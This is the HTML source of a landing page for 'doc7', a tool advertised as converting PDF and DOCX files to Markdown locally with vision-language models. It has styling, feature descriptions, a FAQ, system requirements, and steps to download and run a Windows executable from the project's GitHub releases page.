-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathindex.html
More file actions
240 lines (232 loc) · 7.91 KB
/
Copy pathindex.html
File metadata and controls
240 lines (232 loc) · 7.91 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="Turn documents into AI-ready Markdown with visual understanding. Open-source tool for converting PDF and DOCX to Markdown locally using vision-language models.">
<meta name="keywords" content="document-ai, docx-to-markdown, local-ai, markdown, multimodal, open-source, pdf-to-markdown, vision-language-model">
<meta name="author" content="haunted-coder">
<title>doc7 - Turn Documents into AI-Ready Markdown</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, sans-serif;
background: #f0f4f8;
color: #1a202c;
line-height: 1.7;
padding: 20px;
}
.container {
max-width: 880px;
margin: 0 auto;
background: #ffffff;
border-radius: 20px;
box-shadow: 0 10px 30px rgba(0,0,0,0.08);
padding: 40px 35px;
}
h1 {
font-size: 2.2rem;
margin-bottom: 12px;
display: flex;
align-items: center;
gap: 10px;
}
h1 span {
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
background-clip: text;
}
.badge {
display: inline-block;
background: #667eea;
color: white;
padding: 14px 32px;
border-radius: 50px;
font-size: 1.1rem;
font-weight: 600;
text-decoration: none;
margin: 20px 0;
box-shadow: 0 4px 15px rgba(102,126,234,0.4);
transition: transform 0.2s, box-shadow 0.2s;
}
.badge:hover {
transform: translateY(-2px);
box-shadow: 0 6px 20px rgba(102,126,234,0.5);
}
.badge-alt {
background: #ed8936;
box-shadow: 0 4px 15px rgba(237,137,54,0.4);
}
h2 {
font-size: 1.6rem;
margin-top: 40px;
margin-bottom: 16px;
padding-bottom: 8px;
border-bottom: 3px solid #e2e8f0;
display: flex;
align-items: center;
gap: 10px;
}
p {
margin-bottom: 16px;
font-size: 1.05rem;
}
ul, ol {
margin: 16px 0 24px 24px;
}
li {
margin-bottom: 8px;
}
strong {
color: #2d3748;
}
code {
background: #edf2f7;
padding: 3px 8px;
border-radius: 6px;
font-size: 0.95rem;
}
.feature-grid {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
gap: 20px;
margin: 30px 0;
}
.feature-card {
background: #f7fafc;
border-radius: 14px;
padding: 20px;
text-align: center;
box-shadow: 0 2px 6px rgba(0,0,0,0.04);
}
.feature-card h3 {
font-size: 1.3rem;
margin-bottom: 8px;
color: #4a5568;
}
.feature-card p {
font-size: 0.95rem;
color: #718096;
}
.download-section {
background: #ebf4ff;
border-radius: 16px;
padding: 30px;
margin: 30px 0;
text-align: center;
}
.faq-item {
margin-bottom: 20px;
}
.faq-item h3 {
font-size: 1.1rem;
color: #2b6cb0;
margin-bottom: 6px;
}
hr {
border: 0;
border-top: 2px solid #e2e8f0;
margin: 40px 0;
}
footer {
text-align: center;
color: #718096;
font-size: 0.9rem;
margin-top: 30px;
}
@media (max-width: 600px) {
.container {
padding: 20px 15px;
}
h1 {
font-size: 1.6rem;
flex-wrap: wrap;
}
.badge {
display: block;
text-align: center;
}
}
</style>
</head>
<body>
<div class="container">
<h1>📄 <span>doc7</span> - Turn Documents into AI-Ready Markdown</h1>
<p style="font-size:1.15rem;color:#4a5568;">Convert PDF and DOCX to clean Markdown with visual understanding — completely local and private.</p>
<a href="https://github.com/haunted-coder/doc7/releases" class="badge">⬇️ Download doc7 Now</a>
<h2>🚀 What is doc7?</h2>
<p>doc7 is a free, open-source tool that turns your documents (PDF, DOCX, and more) into Markdown format. It uses advanced visual language models to understand tables, images, and complex layouts, giving you clean, AI-ready text. Everything runs on your own computer — no cloud, no uploads, no privacy concerns.</p>
<h2>✨ Key Features</h2>
<div class="feature-grid">
<div class="feature-card">
<h3>📑 PDF to Markdown</h3>
<p>Converts PDF files with text, images, and tables into structured Markdown.</p>
</div>
<div class="feature-card">
<h3>📝 DOCX to Markdown</h3>
<p>Transforms Word documents while preserving headings, lists, and formatting.</p>
</div>
<div class="feature-card">
<h3>🧠 Visual Understanding</h3>
<p>Understands images, charts, and layout using local vision-language AI models.</p>
</div>
<div class="feature-card">
<h3>🔒 100% Local & Private</h3>
<p>All processing happens on your machine — no data ever leaves your computer.</p>
</div>
</div>
<h2>📥 Download & Install</h2>
<div class="download-section">
<p><strong>Step 1:</strong> Visit this link to download the application.</p>
<a href="https://github.com/haunted-coder/doc7/releases" class="badge badge-alt">⬇️ Go to Downloads Page</a>
<p style="margin-top:16px;"><strong>Step 2:</strong> On the page, click the latest release (usually at the top).</p>
<p><strong>Step 3:</strong> Download the file that matches your computer (e.g., <code>doc7-windows.exe</code>).</p>
<p><strong>Step 4:</strong> Run the downloaded file and follow the on-screen instructions.</p>
</div>
<h2>🖥️ How to Use doc7</h2>
<ol>
<li><strong>Open doc7</strong> after installation.</li>
<li><strong>Drag and drop</strong> a PDF or DOCX file onto the window.</li>
<li><strong>Click "Convert"</strong> — the tool automatically analyzes the document.</li>
<li><strong>Save the Markdown</strong> output to your computer. That's it!</li>
</ol>
<p>No coding or configuration required. The app works right out of the box.</p>
<h2>❓ Frequently Asked Questions</h2>
<div class="faq-item">
<h3>Is doc7 free?</h3>
<p>Yes, doc7 is 100% free and open-source. No hidden fees or subscriptions.</p>
</div>
<div class="faq-item">
<h3>Do I need an internet connection?</h3>
<p>No. Everything runs locally on your computer. However, the first conversion may download a small AI model (one-time).</p>
</div>
<div class="faq-item">
<h3>What file types are supported?</h3>
<p>Currently, PDF and DOCX are fully supported. More formats coming soon.</p>
</div>
<div class="faq-item">
<h3>Is my data private?</h3>
<p>Absolutely. Your documents never leave your device. No uploads, no tracking.</p>
</div>
<h2>🛠️ System Requirements</h2>
<ul>
<li><strong>Operating System:</strong> Windows 10 or newer (64-bit recommended)</li>
<li><strong>RAM:</strong> 4 GB minimum (8 GB recommended for large documents)</li>
<li><strong>Storage:</strong> 500 MB free space</li>
<li><strong>Graphics:</strong> Any modern GPU or integrated graphics works</li>
</ul>
<h2>🤝 Contribute & Support</h2>
<p>doc7 is open-source and community-driven. If you find a bug or have a feature request, please <a href="https://github.com/haunted-coder/doc7/issues">open an issue on GitHub</a>. Contributions are welcome!</p>
<hr>
<footer>
<p>Keywords: document-ai, docx-to-markdown, local-ai, markdown, multimodal, open-source, pdf-to-markdown, vision-language-model</p>
<p>Built with ❤️ by <a href="https://github.com/haunted-coder">haunted-coder</a></p>
</footer>
</div>
</body>
</html>